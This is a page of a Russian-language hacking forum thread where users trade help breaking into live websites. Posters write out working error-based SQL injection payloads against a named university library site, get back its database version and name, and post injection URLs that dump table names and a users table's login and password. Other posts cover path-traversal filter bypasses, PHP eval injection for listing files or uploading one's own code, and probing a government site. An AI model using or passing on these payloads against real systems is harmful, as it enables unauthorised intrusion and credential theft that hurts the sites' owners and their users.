Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1090 of 1207
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    SpaceWeb и это режет.

    Там только %0a вместо порбелов помогает.
     
    _________________________
    #21781 BigBear, 28 Jan 2013
    1 person likes this.
  2. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    Добрый вечер.
    Нашел уязвимость подобную этой
    https://forum.antichat.ru/showthread.php?t=10915

    В общем проблема такая.
    Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?
     
    #21782 M1ks, 28 Jan 2013
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (список файлов в папке или залить свой кодес ). лично я не вижу в этой особой проблемы.
     
    _________________________
    #21783 +toxa+, 28 Jan 2013
  4. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    можно ли обойти такой фильтр




    Code:
    if (strpos($_GET['f'], '..') === false) 
{      
$a = dirname(__FILE__);   
echo file_get_contents( $a . $_GET['f']); 
}

    я так понимаю нужен такой символ между точками который не должен нарушать сработку
    конструкции .X./ в nix системах
    тогда он пройдет через фильтр
    либо замена точек на что то другое еквивалентное им
     
    #21784 ysmat, 29 Jan 2013
  5. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    Не получилось через opendir.
    Пример как вставлял:
    &cmd=opendir("../");&highlight='.eval($_GET[cmd]).'
    ничего не выводит..
     
    #21785 M1ks, 29 Jan 2013
  6. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    https://rdot.org/forum/showpost.php?p=3323&postcount=16 - в помощь. :)
     
    #21786 Zed0x, 29 Jan 2013
  7. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    версию вывести возможно тут?

    _http://vkontakte.dj/index.php?option=com_fireboard&Itemid=41&catid=9&id=3378&func=view'
     
    #21787 er9j6@, 29 Jan 2013
  8. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    я уже пробовал ети методы они не помогают
    но в описании функции file_get_contents есть интересное
    цитата с http://php.su/functions/?f=file_get_contents&choice=info


    из етого следует что функция file_get_contents в принципе должна понимать урл кодированую строку пути
    но по факту что то не работает
     
    #21788 ysmat, 29 Jan 2013
  9. ProFiLeR

    ProFiLeR New Member

    Joined:
    29 Jan 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Говорю по факту, что есть, на данный момент:
    1) самописный движок
    2) ссылка типа index.php?id=hats
    3) MySQL запрос не генерируется
    4) id используется в условии if'a ( if( $_GET['id'] == "hats" ) {…} )

    теперь вопрос, можно ли скормить параметру id спецсимвол ' (одинарную ковычку) и завершить if со своим последующим кодом, поставя знак комментария после своего кода, чтобы последующий код не мешал

    Например:
    1) .../index.php?id=hats'] == 'hats' && function(){ мой_код; return true;} ) { //
    2) тоесть, чтобы код изменился с
    if( $_GET['id'] == 'hats' ) {
    на
    if( 'hats' == 'hats' && function(){ мой_код; return true;} ) { // == "hats" ) {

    P.S. извините, что не тегую, т.к. пишу с мобильного
     
    #21789 ProFiLeR, 29 Jan 2013
  10. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    ProFiLeR, нет.
     
    #21790 mironich, 29 Jan 2013
  11. ProFiLeR

    ProFiLeR New Member

    Joined:
    29 Jan 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Жаль, значит придется ждать, когда перелистывание страниц сделают и SQLinj попробовать.

    Я думал, что мой способ сработает, так как PHP интерпретируемый язык, но оказалось, что нет (не сработает).
     
    #21791 ProFiLeR, 29 Jan 2013
  12. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Error Number: 1064
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56

    и дальше идет листинг больщого Select Запроса.
    первый раз вообще вижу такую шляпу. крутится?
     
    #21792 justonline, 29 Jan 2013
    Last edited: 29 Jan 2013
  13. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    ребят, уязвимость в поле поиска - при подставке кавычки выдаёт -
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1

    как правильно составлять запрос...?
     
    #21793 LelouchMe, 30 Jan 2013
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Нужен весь запрос, или хотя бы урл.

    Попробуй так

    ' and 1='1
    ' and 1='2

    И сравни результаты.
     
    _________________________
    #21794 BigBear, 30 Jan 2013
  15. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Ни то ни другое не работает... Вот урл -
    http://lib.pntu.edu.ua/?module=vds*section-84
     
    #21795 LelouchMe, 30 Jan 2013
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    'and(1)='1 TRUE

    'and(2)='1 FALSE

    Режутся пробелы. Можно юзать только беспробельные варианты.

    Ещё чуток покручу - выложу тут запросы.

    UPD.

    'and(extractvalue(1,concat(0x3a,(select(@@version)))))='

    XPATH syntax error: ':5.1.49-3'

    'and(extractvalue(1,concat(0x3a,(select(database())))))='

    XPATH syntax error: ':lib_bd'
     
    _________________________
    #21796 BigBear, 30 Jan 2013
    Last edited: 30 Jan 2013
    1 person likes this.
  17. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    То есть дальше посимвольный перебор...?
    плюсую...)+
     
    #21797 LelouchMe, 30 Jan 2013
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Не надо посимвольного перебора.

    Я ж тебе докрутил до Error-Based. Теперь только через ошибку.

    Да тебе и этого выше крыши.
     
    _________________________
    #21798 BigBear, 30 Jan 2013
  19. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...
    Короче по такой схеме крутить я так понял:

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+0,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+3,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+4,1)))--

    http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,login,password)+from+users1+limit+0,1)))--

    или как тут

     
    #21799 LelouchMe, 30 Jan 2013
    Last edited: 30 Jan 2013
  20. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Да, кстати, а кто подскажет что это такое...?)
    Вроде как не слепая... С такой ещё не стыкался...
    http://www.rada-poltava.gov.ua/news/1'00000000'/
     
    #21800 LelouchMe, 30 Jan 2013
(You must log in or sign up to post here.)
Page 1090 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.